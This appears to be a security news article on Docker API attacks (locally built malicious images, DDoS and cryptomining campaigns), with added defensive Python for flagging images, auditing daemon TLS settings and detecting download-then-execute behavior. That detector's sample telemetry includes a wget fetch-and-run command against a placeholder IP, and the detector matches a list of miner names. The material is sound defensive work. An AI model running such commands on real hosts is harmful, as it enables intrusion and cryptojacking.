There has been a drastic increase in cyberattacks on cloud-native environments like Docker in recent times. To gain persistence, attackers have recently been seen exploiting misconfigured Docker API ports and building the malicious image directly on the host.

Newly observed attack

In July 2020, Aqua's Team Nautilus cybersecurity researchers found a new type of attack involving Docker images, which is very hard for defenders to detect using traditional security mechanisms like a static scanner.
  • The attacker builds a malicious image on the host rather than pulling one from a public registry, by exploiting a misconfigured Docker API port. The build starts from a legitimate vanilla image, such as Alpine or Ubuntu, and downloads malicious components like XMRIG from a remote source at build time.
  • Once the container has spun up, the malicious activity originates from within the newly built image already living on the system, which renders static-scanner-based security systems useless.
  • Unlike in traditional attacks, the images used here are never stored in a registry, so no one can take them down. In addition, the image name, and possibly its ID, is randomly generated and therefore unique to each host, so defenders cannot add the image to a restricted list.
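Because such an image never touches a registry, the host's own image inventory is the place a defender can still see it. The following is an added example (not code from Aqua or Cyware) that applies two heuristics from the bullets above to records shaped like the Docker Engine API's GET /images/json response: an image with no RepoDigests was built locally and never pulled or pushed, and a repository name that looks randomly generated has no business being there. The inventory records, the entropy threshold and the 12-hex-character name pattern are constructed for the example.

```python
import math
import re
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Bits per character; random identifiers score higher than real words."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def repo_name(tag: str) -> str:
    """'registry/ns/name:tag' -> 'name'."""
    ref = tag.split("@", 1)[0]
    last = ref.rsplit("/", 1)[-1]
    return last.split(":", 1)[0]


def looks_generated(tag: str) -> bool:
    """Heuristic (assumed thresholds): does the repository name resemble a random id?"""
    name = repo_name(tag)
    if re.fullmatch(r"[0-9a-f]{12,}", name):            # hex id reused as a name
        return True
    if len(name) >= 10 and re.search(r"\d", name) and re.search(r"[a-z]", name):
        return shannon_entropy(name) > 3.2               # mixed alnum, high entropy
    return False


def flag_images(images):
    """Return findings for images that lack registry provenance.

    `images` is a list of dicts shaped like the Docker Engine API response to
    GET /images/json (Id, RepoTags, RepoDigests). An image built on the host
    and never pushed has no RepoDigests entry; that alone is normal for CI
    builds, so an alert needs a second signal (untagged or random-looking name).
    """
    findings = []
    for img in images:
        tags = img.get("RepoTags") or []
        digests = img.get("RepoDigests") or []
        reasons = []
        if not digests:
            reasons.append("no RepoDigests (built locally, never pulled or pushed)")
        dangling = not tags or tags == ["<none>:<none>"]
        if dangling:
            reasons.append("untagged image")
        elif any(looks_generated(t) for t in tags):
            reasons.append("repository name looks randomly generated")
        if reasons:
            findings.append({
                "Id": img["Id"], "RepoTags": tags, "reasons": reasons,
                "suspicious": (not digests) and len(reasons) > 1,
            })
    return findings


# Constructed sample inventory; the ids are placeholders, not real image digests.
SAMPLE_IMAGES = [
    {"Id": "sha256:" + "a" * 64, "RepoTags": ["alpine:3.12"],
     "RepoDigests": ["alpine@sha256:" + "b" * 64]},          # pulled from a registry
    {"Id": "sha256:" + "c" * 64, "RepoTags": ["7f3a9c2b4e1d:latest"],
     "RepoDigests": []},                                     # built locally, random name
    {"Id": "sha256:" + "d" * 64, "RepoTags": ["ci/app-build:42"],
     "RepoDigests": []},                                     # legitimate local CI build
    {"Id": "sha256:" + "e" * 64, "RepoTags": None, "RepoDigests": None},  # dangling
]

if __name__ == "__main__":
    for finding in flag_images(SAMPLE_IMAGES):
        level = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(finding["Id"][:19], finding["RepoTags"], level, finding["reasons"])
```

In practice the records come from `docker image ls --format json` or the engine API on each host, and the "suspicious" verdict should be joined against the CI system's list of expected local builds before anyone pages on it.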

Other threats to Docker servers

Targeted attacks on Docker containerization technology have become a more frequent occurrence in the last few years.
  • In June 2020, an organized series of attacks against Docker servers deployed the DDoS malware variants XORDDoS, Kaiji, DOFLOO, and SDDOS, targeting Docker servers whose API port (2375) was exposed for unencrypted and unauthenticated communication.
  • In April 2020, a self-propagating crypto mining campaign targeted misconfigured open Docker Daemon API ports using the Kinsing malware and the ‘kdevtmpfsi’ crypto miner.
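Both campaigns above started from the same misconfiguration: the daemon API reachable over plain TCP on port 2375 with no client authentication. The following is an added example (not from the page's sources) that audits a host's daemon.json together with the dockerd command line for that condition. The keys it reads (`hosts`, `tls`, `tlsverify`) and the `-H`/`--host`, `--tls`, `--tlsverify` flags are real dockerd options; the two configurations at the bottom are constructed, with the weak one beside a hardened version that listens only on a management address with mutual TLS.

```python
import json
import shlex
from urllib.parse import urlsplit

ALL_INTERFACES = {"", "0.0.0.0", "::"}


def listeners(hosts):
    """Yield (host, port) for every tcp:// endpoint in a dockerd hosts list.

    dockerd uses port 2375 when a tcp:// host gives none and TLS is off.
    """
    for h in hosts:
        if h.startswith("tcp://"):
            u = urlsplit(h)
            yield (u.hostname or "", u.port or 2375)


def flag_on(argv, name):
    """True if a boolean flag is present as `--name` or `--name=true`."""
    return name in argv or f"{name}=true" in argv


def hosts_from_cmdline(cmdline: str):
    """Return (argv, list of -H/--host values) for a dockerd command line."""
    argv = shlex.split(cmdline)
    out = []
    for i, a in enumerate(argv):
        if a in ("-H", "--host") and i + 1 < len(argv):
            out.append(argv[i + 1])
        elif a.startswith(("-H=", "--host=")):
            out.append(a.split("=", 1)[1])
    return argv, out


def audit_daemon(daemon_json: str, cmdline: str = "dockerd"):
    """Audit daemon.json content plus the dockerd command line.

    Returns a list of finding strings; an empty list means the API is only
    reachable over the unix socket or over mutually authenticated TLS.
    """
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv, cli_hosts = hosts_from_cmdline(cmdline)
    hosts = list(cfg.get("hosts", [])) + cli_hosts
    tlsverify = bool(cfg.get("tlsverify")) or flag_on(argv, "--tlsverify")
    tls = tlsverify or bool(cfg.get("tls")) or flag_on(argv, "--tls")
    findings = []
    for host, port in listeners(hosts):
        where = f"tcp://{host or '0.0.0.0'}:{port}"
        if not tls:
            findings.append(f"{where}: API served in cleartext with no authentication")
        elif not tlsverify:
            # --tls alone encrypts the channel but accepts any client certificate
            findings.append(f"{where}: TLS without --tlsverify, any client is accepted")
        if host in ALL_INTERFACES:
            findings.append(f"{where}: bound on every interface, not just a management address")
    return findings


# Constructed configurations, not taken from any real host.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon(cfg) or ["no findings"])
```

Check both sources on every host: the packaged systemd unit usually passes `-H fd://` on the command line, and a `hosts` key in daemon.json conflicts with it, so an operator who wanted remote access may have put the tcp:// listener in either place.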


Users should run a Dynamic Threat Analysis (DTA) scanner in cloud-native environments. Such dynamic scanners look for behavior patterns rather than static signatures, and can help defenders detect these kinds of attacks.
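The behavior that a static scanner misses is visible at run time: a container started from a clean base image fetches a binary over the network and then executes it. The following is an added example (not Aqua's DTA product or any vendor's code) of that kind of behavioral rule, run over constructed process-execution telemetry. It expands `sh -c` command chains, remembers paths written by wget or curl per container, and alerts when one of them is later executed or when the executed binary carries a miner name mentioned above (XMRIG, kdevtmpfsi). The event schema, the sample events and the addresses in them are constructed for the example.

```python
import re
import shlex
from collections import defaultdict

# Miner names that appear in the campaigns described above.
MINER_NAMES = {"xmrig", "kdevtmpfsi"}
SHELLS = {"sh", "bash", "ash", "dash"}


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def subcommands(argv):
    """Expand `sh -c '<script>'` into its chained commands; otherwise yield argv."""
    if len(argv) >= 3 and basename(argv[0]) in SHELLS and argv[1] == "-c":
        for piece in re.split(r"&&|\|\||;|\|", argv[2]):
            piece = piece.strip()
            if piece:
                yield shlex.split(piece)
    else:
        yield list(argv)


def download_target(argv):
    """If argv is a wget/curl call that writes to a file, return that path."""
    if not argv:
        return None
    tool = basename(argv[0])
    for i, a in enumerate(argv):
        if tool == "wget" and a == "-O" and i + 1 < len(argv):
            return argv[i + 1]
        if tool == "wget" and a.startswith("--output-document="):
            return a.split("=", 1)[1]
        if tool == "curl" and a in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
    return None


def detect(events):
    """Correlate process-execution events per container and return alerts.

    Each event is a dict (assumed schema): {"ts", "type": "exec", "container", "argv"}.
    Rule 1: a file fetched by wget/curl is later executed in the same container.
    Rule 2: the executed binary carries a known miner name.
    """
    downloaded = defaultdict(set)   # container id -> paths written by downloads
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] != "exec":
            continue
        cid = ev["container"]
        for argv in subcommands(ev["argv"]):
            if not argv:
                continue
            path = download_target(argv)
            if path:
                downloaded[cid].add(path)
                continue
            exe = argv[0]
            if exe in downloaded[cid]:
                alerts.append({"ts": ev["ts"], "container": cid, "exe": exe,
                               "rule": "downloaded-then-executed"})
            if basename(exe).lower() in MINER_NAMES:
                alerts.append({"ts": ev["ts"], "container": cid, "exe": exe,
                               "rule": "known-miner-name"})
    return alerts


# Constructed sample telemetry (documentation-range address, example hostnames).
SAMPLE_EVENTS = [
    {"ts": 1, "type": "exec", "container": "c1",
     "argv": ["/bin/sh", "-c",
              "wget http://203.0.113.10/payload -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x"]},
    {"ts": 2, "type": "exec", "container": "c2",
     "argv": ["curl", "-o", "/tmp/app.tar.gz", "https://files.example/app.tar.gz"]},
    {"ts": 3, "type": "exec", "container": "c2", "argv": ["tar", "xzf", "/tmp/app.tar.gz"]},
    {"ts": 4, "type": "exec", "container": "c3", "argv": ["/usr/bin/xmrig"]},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Container c2 downloads a file and only unpacks it, so it produces no alert; the rule keys on execution of the fetched path, not on the download itself, which keeps ordinary package and artifact fetches quiet. Name matching is the weakest of the two rules, since a renamed binary evades it, which is why the download-then-execute correlation is the one worth tuning.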

Cyware Publisher